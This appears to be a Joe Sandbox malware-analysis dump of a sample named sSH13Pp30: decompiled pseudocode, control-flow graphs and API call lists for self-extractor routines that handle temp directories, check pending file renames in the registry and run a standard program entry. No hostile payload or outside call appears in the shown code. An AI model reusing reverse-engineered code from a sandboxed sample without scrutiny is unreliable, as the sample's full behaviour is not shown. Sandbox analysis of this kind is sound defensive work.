                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5560
                                                                                                                                                                                                      0x000e5566
                                                                                                                                                                                                      0x000e5569
                                                                                                                                                                                                      0x000e556f
                                                                                                                                                                                                      0x000e556f
                                                                                                                                                                                                      0x000e5581
                                                                                                                                                                                                      0x000e5581
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5581
                                                                                                                                                                                                      0x000e5545
                                                                                                                                                                                                      0x000e557c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e557c
                                                                                                                                                                                                      0x000e5547
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5547
                                                                                                                                                                                                      0x000e548a
                                                                                                                                                                                                      0x000e5490
                                                                                                                                                                                                      0x000e5497
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e549d
                                                                                                                                                                                                      0x000e54ab
                                                                                                                                                                                                      0x000e54b4
                                                                                                                                                                                                      0x000e54c0
                                                                                                                                                                                                      0x000e550c
                                                                                                                                                                                                      0x000e5511
                                                                                                                                                                                                      0x000e5515
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5515
                                                                                                                                                                                                      0x000e54c9
                                                                                                                                                                                                      0x000e54d6
                                                                                                                                                                                                      0x000e54d8
                                                                                                                                                                                                      0x000e54fe
                                                                                                                                                                                                      0x000e5503
                                                                                                                                                                                                      0x000e5507
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e5507
                                                                                                                                                                                                      0x000e54da
                                                                                                                                                                                                      0x000e54dd
                                                                                                                                                                                                      0x000e54f7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e54f7
                                                                                                                                                                                                      0x000e54df
                                                                                                                                                                                                      0x000e54e2
                                                                                                                                                                                                      0x000e54f0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e54f0
                                                                                                                                                                                                      0x000e54e7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e54e9
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E54C9
                                                                                                                                                                                                      • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E553D
                                                                                                                                                                                                      • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E556F
                                                                                                                                                                                                        • Part of subcall function 000E53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E53FB
                                                                                                                                                                                                        • Part of subcall function 000E53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5402
                                                                                                                                                                                                        • Part of subcall function 000E53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E541F
                                                                                                                                                                                                        • Part of subcall function 000E53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E542B
                                                                                                                                                                                                        • Part of subcall function 000E53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 000E5434
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                      • API String ID: 1979080616-3388087672
                                                                                                                                                                                                      • Opcode ID: fe067875be6869b315c767c5673ba21b13486d4de61875dd093f88fbe6cf9994
                                                                                                                                                                                                      • Instruction ID: dad5d8fac2b4c9a5fcf39ee9273321e70ab72882f7c272e93eff8ce0f2479792
                                                                                                                                                                                                      • Opcode Fuzzy Hash: fe067875be6869b315c767c5673ba21b13486d4de61875dd093f88fbe6cf9994
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C9316972B00EC05FDB249B379C945FE73EAAB8174AB04087AE502F7291CB74CF018691
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 563 e256d-e257d 564 e2622-e2627 call e24e0 563->564 565 e2583-e2589 563->565 572 e2629-e262f 564->572 567 e258b 565->567 568 e25e8-e2607 RegOpenKeyExA 565->568 567->572 573 e2591-e2595 567->573 569 e2609-e2620 RegQueryInfoKeyA 568->569 570 e25e3-e25e6 568->570 574 e25d1-e25dd RegCloseKey 569->574 570->572 573->572 575 e259b-e25ba RegOpenKeyExA 573->575 574->570 575->570 576 e25bc-e25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                                                                      			E000E256D(signed int __ecx) {
                                                                                                                                                                                                      				int _v8;
                                                                                                                                                                                                      				void* _v12;
                                                                                                                                                                                                      				signed int _t13;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				long _t24;
                                                                                                                                                                                                      				void* _t26;
                                                                                                                                                                                                      				int _t31;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                      				_t31 = 0;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t31 = E000E24E0(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t34 = _t13 - 1;
                                                                                                                                                                                                      					if(_t34 == 0) {
                                                                                                                                                                                                      						_v8 = 0;
                                                                                                                                                                                                      						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                      							goto L7;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                      							goto L6;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L12:
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                      							_v8 = 0;
                                                                                                                                                                                                      							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                      							if(_t24 == 0) {
                                                                                                                                                                                                      								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                      								L6:
                                                                                                                                                                                                      								asm("sbb eax, eax");
                                                                                                                                                                                                      								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                      								RegCloseKey(_v12); // executed
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							_t31 = _v8;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t31;
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}











                                                                                                                                                                                                      0x000e2572
                                                                                                                                                                                                      0x000e2573
                                                                                                                                                                                                      0x000e2575
                                                                                                                                                                                                      0x000e2578
                                                                                                                                                                                                      0x000e257d
                                                                                                                                                                                                      0x000e2627
                                                                                                                                                                                                      0x000e2583
                                                                                                                                                                                                      0x000e2586
                                                                                                                                                                                                      0x000e2589
                                                                                                                                                                                                      0x000e25eb
                                                                                                                                                                                                      0x000e2607
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e2609
                                                                                                                                                                                                      0x000e261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e261a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e258b
                                                                                                                                                                                                      0x000e258b
                                                                                                                                                                                                      0x000e259e
                                                                                                                                                                                                      0x000e25b2
                                                                                                                                                                                                      0x000e25ba
                                                                                                                                                                                                      0x000e25cb
                                                                                                                                                                                                      0x000e25d1
                                                                                                                                                                                                      0x000e25d6
                                                                                                                                                                                                      0x000e25da
                                                                                                                                                                                                      0x000e25dd
                                                                                                                                                                                                      0x000e25dd
                                                                                                                                                                                                      0x000e25e3
                                                                                                                                                                                                      0x000e25e3
                                                                                                                                                                                                      0x000e25e3
                                                                                                                                                                                                      0x000e258b
                                                                                                                                                                                                      0x000e2589
                                                                                                                                                                                                      0x000e262f
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000036,000E4096,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?), ref: 000E25B2
                                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?,000E4096), ref: 000E25CB
                                                                                                                                                                                                      • RegCloseKey.KERNELBASE(?,?,000E1ED3,00000001,00000000,?,?,000E4137,?,000E4096), ref: 000E25DD
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000036,000E4096,000E4096,?,000E1ED3,00000001,00000000,?,?,000E4137,?), ref: 000E25FF
                                                                                                                                                                                                      • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,000E4096,00000000,00000000,00000000,00000000,?,000E1ED3,00000001,00000000), ref: 000E261A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • PendingFileRenameOperations, xrefs: 000E25C3
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000E25F5
                                                                                                                                                                                                      • System\CurrentControlSet\Control\Session Manager, xrefs: 000E25A8
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                      • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                      • API String ID: 2209512893-559176071
                                                                                                                                                                                                      • Opcode ID: 6f854575b85b8a6295e3eb9b9c6dd302a695682e9a1d2dcfe51cb96c8dc04463
                                                                                                                                                                                                      • Instruction ID: 8486df29e2e00e42cfb7d05c7948d10a37964d2d009b1e5504275a2a0e4f9e7e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f854575b85b8a6295e3eb9b9c6dd302a695682e9a1d2dcfe51cb96c8dc04463
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5116D36A022A8FFEB20DB929C49DFFBEACEB067A1F114155B908B2011D6705A44D6A1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 577 e6a60-e6a91 call e7155 call e7208 GetStartupInfoW 583 e6a93-e6aa2 577->583 584 e6abc-e6abe 583->584 585 e6aa4-e6aa6 583->585 588 e6abf-e6ac5 584->588 586 e6aaf-e6aba Sleep 585->586 587 e6aa8-e6aad 585->587 586->583 587->588 589 e6ac7-e6acf _amsg_exit 588->589 590 e6ad1-e6ad7 588->590 591 e6b0b-e6b11 589->591 592 e6ad9-e6ae9 call e6c3f 590->592 593 e6b05 590->593 595 e6b2e-e6b30 591->595 596 e6b13-e6b24 _initterm 591->596 597 e6aee-e6af2 592->597 593->591 598 e6b3b-e6b42 595->598 599 e6b32-e6b39 595->599 596->595 597->591 602 e6af4-e6b00 597->602 600 e6b67-e6b71 598->600 601 e6b44-e6b51 call e7060 598->601 599->598 604 e6b74-e6b79 600->604 601->600 610 e6b53-e6b65 601->610 605 e6c39-e6c3e call e724d 602->605 608 e6b7b-e6b7d 604->608 609 e6bc5-e6bc8 604->609 614 e6b7f-e6b81 608->614 615 e6b94-e6b98 608->615 611 e6bca-e6bd3 609->611 612 e6bd6-e6be3 _ismbblead 609->612 610->600 611->612 616 e6be9-e6bed 612->616 617 e6be5-e6be6 612->617 614->609 618 e6b83-e6b85 614->618 619 e6b9a-e6b9e 615->619 620 e6ba0-e6ba2 615->620 616->604 623 e6c1e-e6c25 616->623 617->616 618->615 624 e6b87-e6b8a 618->624 621 e6ba3-e6bbc call e2bfb 619->621 620->621 621->623 630 e6bbe-e6bbf exit 621->630 626 e6c27-e6c2d _cexit 623->626 627 e6c32 623->627 624->615 628 e6b8c-e6b92 624->628 626->627 627->605 628->618 630->609
                                                                                                                                                                                                      C-Code - Quality: 51%
                                                                                                                                                                                                      			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int* _t25;
                                                                                                                                                                                                      				signed int _t26;
                                                                                                                                                                                                      				signed int _t29;
                                                                                                                                                                                                      				int _t30;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed char _t41;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      				signed int _t54;
                                                                                                                                                                                                      				intOrPtr _t56;
                                                                                                                                                                                                      				signed int _t58;
                                                                                                                                                                                                      				signed int _t59;
                                                                                                                                                                                                      				intOrPtr* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				void* _t67;
                                                                                                                                                                                                      				void* _t68;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				E000E7155();
                                                                                                                                                                                                      				_push(0x58);
                                                                                                                                                                                                      				_push(0xe72b8);
                                                                                                                                                                                                      				E000E7208(__ebx, __edi, __esi);
                                                                                                                                                                                                      				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                      				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                      				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                      				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                      				_t53 = 0;
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                      					if(0 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(0 != _t56) {
                                                                                                                                                                                                      						Sleep(0x3e8);
                                                                                                                                                                                                      						continue;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t58 = 1;
                                                                                                                                                                                                      						_t53 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_t67 =  *0xe88b0 - _t58; // 0x2
                                                                                                                                                                                                      					if(_t67 != 0) {
                                                                                                                                                                                                      						__eflags =  *0xe88b0; // 0x2
                                                                                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                                                                                      							 *0xe81e4 = _t58;
                                                                                                                                                                                                      							goto L13;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							 *0xe88b0 = _t58;
                                                                                                                                                                                                      							_t37 = E000E6C3F(0xe10b8, 0xe10c4); // executed
                                                                                                                                                                                                      							__eflags = _t37;
                                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                                      								goto L13;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      								_t30 = 0xff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_push(0x1f);
                                                                                                                                                                                                      						L000E6FF4();
                                                                                                                                                                                                      						L13:
                                                                                                                                                                                                      						_t68 =  *0xe88b0 - _t58; // 0x2
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_push(0xe10b4);
                                                                                                                                                                                                      							_push(0xe10ac);
                                                                                                                                                                                                      							L000E7202();
                                                                                                                                                                                                      							 *0xe88b0 = 2;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if(_t53 == 0) {
                                                                                                                                                                                                      							 *0xe88ac = 0;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t71 =  *0xe88b4;
                                                                                                                                                                                                      						if( *0xe88b4 != 0 && E000E7060(_t71, 0xe88b4) != 0) {
                                                                                                                                                                                                      							_t60 =  *0xe88b4; // 0x0
                                                                                                                                                                                                      							 *0xea288(0, 2, 0);
                                                                                                                                                                                                      							 *_t60();
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t25 = __imp___acmdln; // 0x76665b9c
                                                                                                                                                                                                      						_t59 =  *_t25;
                                                                                                                                                                                                      						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                                      							_t41 =  *_t59;
                                                                                                                                                                                                      							if(_t41 > 0x20) {
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							if(_t41 != 0) {
                                                                                                                                                                                                      								if(_t54 != 0) {
                                                                                                                                                                                                      									goto L32;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                      										_t59 = _t59 + 1;
                                                                                                                                                                                                      										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      										_t41 =  *_t59;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                      							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                      								_t29 = 0xa;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push(_t29);
                                                                                                                                                                                                      							_t30 = E000E2BFB(0xe0000, 0, _t59); // executed
                                                                                                                                                                                                      							 *0xe81e0 = _t30;
                                                                                                                                                                                                      							__eflags =  *0xe81f8;
                                                                                                                                                                                                      							if( *0xe81f8 == 0) {
                                                                                                                                                                                                      								exit(_t30); // executed
                                                                                                                                                                                                      								goto L32;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							__eflags =  *0xe81e4;
                                                                                                                                                                                                      							if( *0xe81e4 == 0) {
                                                                                                                                                                                                      								__imp___cexit();
                                                                                                                                                                                                      								_t30 =  *0xe81e0; // 0x80070002
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                      							goto L40;
                                                                                                                                                                                                      							L32:
                                                                                                                                                                                                      							__eflags = _t41 - 0x22;
                                                                                                                                                                                                      							if(_t41 == 0x22) {
                                                                                                                                                                                                      								__eflags = _t54;
                                                                                                                                                                                                      								_t15 = _t54 == 0;
                                                                                                                                                                                                      								__eflags = _t15;
                                                                                                                                                                                                      								_t54 = 0 | _t15;
                                                                                                                                                                                                      								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                      							__imp___ismbblead(_t26);
                                                                                                                                                                                                      							__eflags = _t26;
                                                                                                                                                                                                      							if(_t26 != 0) {
                                                                                                                                                                                                      								_t59 = _t59 + 1;
                                                                                                                                                                                                      								__eflags = _t59;
                                                                                                                                                                                                      								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_t59 = _t59 + 1;
                                                                                                                                                                                                      							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L40:
                                                                                                                                                                                                      					return E000E724D(_t30);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t58 = 1;
                                                                                                                                                                                                      				__eflags = 1;
                                                                                                                                                                                                      				goto L7;
                                                                                                                                                                                                      			}


















                                                                                                                                                                                                      0x000e6a60
                                                                                                                                                                                                      0x000e6a6a
                                                                                                                                                                                                      0x000e6a6c
                                                                                                                                                                                                      0x000e6a71
                                                                                                                                                                                                      0x000e6a78
                                                                                                                                                                                                      0x000e6a7f
                                                                                                                                                                                                      0x000e6a85
                                                                                                                                                                                                      0x000e6a8e
                                                                                                                                                                                                      0x000e6a91
                                                                                                                                                                                                      0x000e6a93
                                                                                                                                                                                                      0x000e6a9c
                                                                                                                                                                                                      0x000e6aa2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6aa6
                                                                                                                                                                                                      0x000e6ab4
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6aa8
                                                                                                                                                                                                      0x000e6aaa
                                                                                                                                                                                                      0x000e6aab
                                                                                                                                                                                                      0x000e6aab
                                                                                                                                                                                                      0x000e6abf
                                                                                                                                                                                                      0x000e6abf
                                                                                                                                                                                                      0x000e6ac5
                                                                                                                                                                                                      0x000e6ad1
                                                                                                                                                                                                      0x000e6ad7
                                                                                                                                                                                                      0x000e6b05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6ad9
                                                                                                                                                                                                      0x000e6ad9
                                                                                                                                                                                                      0x000e6ae9
                                                                                                                                                                                                      0x000e6af0
                                                                                                                                                                                                      0x000e6af2
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6af4
                                                                                                                                                                                                      0x000e6af4
                                                                                                                                                                                                      0x000e6afb
                                                                                                                                                                                                      0x000e6afb
                                                                                                                                                                                                      0x000e6af2
                                                                                                                                                                                                      0x000e6ac7
                                                                                                                                                                                                      0x000e6ac7
                                                                                                                                                                                                      0x000e6ac9
                                                                                                                                                                                                      0x000e6b0b
                                                                                                                                                                                                      0x000e6b0b
                                                                                                                                                                                                      0x000e6b11
                                                                                                                                                                                                      0x000e6b13
                                                                                                                                                                                                      0x000e6b18
                                                                                                                                                                                                      0x000e6b1d
                                                                                                                                                                                                      0x000e6b24
                                                                                                                                                                                                      0x000e6b24
                                                                                                                                                                                                      0x000e6b30
                                                                                                                                                                                                      0x000e6b39
                                                                                                                                                                                                      0x000e6b39
                                                                                                                                                                                                      0x000e6b3b
                                                                                                                                                                                                      0x000e6b42
                                                                                                                                                                                                      0x000e6b57
                                                                                                                                                                                                      0x000e6b5f
                                                                                                                                                                                                      0x000e6b65
                                                                                                                                                                                                      0x000e6b65
                                                                                                                                                                                                      0x000e6b67
                                                                                                                                                                                                      0x000e6b6c
                                                                                                                                                                                                      0x000e6b6e
                                                                                                                                                                                                      0x000e6b71
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6b79
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6b7d
                                                                                                                                                                                                      0x000e6b81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6b83
                                                                                                                                                                                                      0x000e6b8c
                                                                                                                                                                                                      0x000e6b8d
                                                                                                                                                                                                      0x000e6b90
                                                                                                                                                                                                      0x000e6b90
                                                                                                                                                                                                      0x000e6b83
                                                                                                                                                                                                      0x000e6b81
                                                                                                                                                                                                      0x000e6b94
                                                                                                                                                                                                      0x000e6b98
                                                                                                                                                                                                      0x000e6ba2
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6b9a
                                                                                                                                                                                                      0x000e6ba3
                                                                                                                                                                                                      0x000e6bab
                                                                                                                                                                                                      0x000e6bb0
                                                                                                                                                                                                      0x000e6bb5
                                                                                                                                                                                                      0x000e6bbc
                                                                                                                                                                                                      0x000e6bbf
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6bbf
                                                                                                                                                                                                      0x000e6c1e
                                                                                                                                                                                                      0x000e6c25
                                                                                                                                                                                                      0x000e6c27
                                                                                                                                                                                                      0x000e6c2d
                                                                                                                                                                                                      0x000e6c2d
                                                                                                                                                                                                      0x000e6c32
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e6bc5
                                                                                                                                                                                                      0x000e6bc5
                                                                                                                                                                                                      0x000e6bc8
                                                                                                                                                                                                      0x000e6bcc
                                                                                                                                                                                                      0x000e6bce
                                                                                                                                                                                                      0x000e6bce
                                                                                                                                                                                                      0x000e6bd1
                                                                                                                                                                                                      0x000e6bd3
                                                                                                                                                                                                      0x000e6bd3
                                                                                                                                                                                                      0x000e6bd6
                                                                                                                                                                                                      0x000e6bda
                                                                                                                                                                                                      0x000e6be1
                                                                                                                                                                                                      0x000e6be3
                                                                                                                                                                                                      0x000e6be5
                                                                                                                                                                                                      0x000e6be5
                                                                                                                                                                                                      0x000e6be6
                                                                                                                                                                                                      0x000e6be6
                                                                                                                                                                                                      0x000e6be9
                                                                                                                                                                                                      0x000e6bea
                                                                                                                                                                                                      0x000e6bea
                                                                                                                                                                                                      0x000e6b74
                                                                                                                                                                                                      0x000e6c39
                                                                                                                                                                                                      0x000e6c3e
                                                                                                                                                                                                      0x000e6c3e
                                                                                                                                                                                                      0x000e6abe
                                                                                                                                                                                                      0x000e6abe
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000E7182
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetCurrentProcessId.KERNEL32 ref: 000E7191
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetCurrentThreadId.KERNEL32 ref: 000E719A
                                                                                                                                                                                                        • Part of subcall function 000E7155: GetTickCount.KERNEL32 ref: 000E71A3
                                                                                                                                                                                                        • Part of subcall function 000E7155: QueryPerformanceCounter.KERNEL32(?), ref: 000E71B8
                                                                                                                                                                                                      • GetStartupInfoW.KERNEL32(?,000E72B8,00000058), ref: 000E6A7F
                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8), ref: 000E6AB4
                                                                                                                                                                                                      • _amsg_exit.MSVCRT ref: 000E6AC9
                                                                                                                                                                                                      • _initterm.MSVCRT ref: 000E6B1D
                                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 000E6B49
                                                                                                                                                                                                      • exit.KERNELBASE ref: 000E6BBF
                                                                                                                                                                                                      • _ismbblead.MSVCRT ref: 000E6BDA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmpDownload File
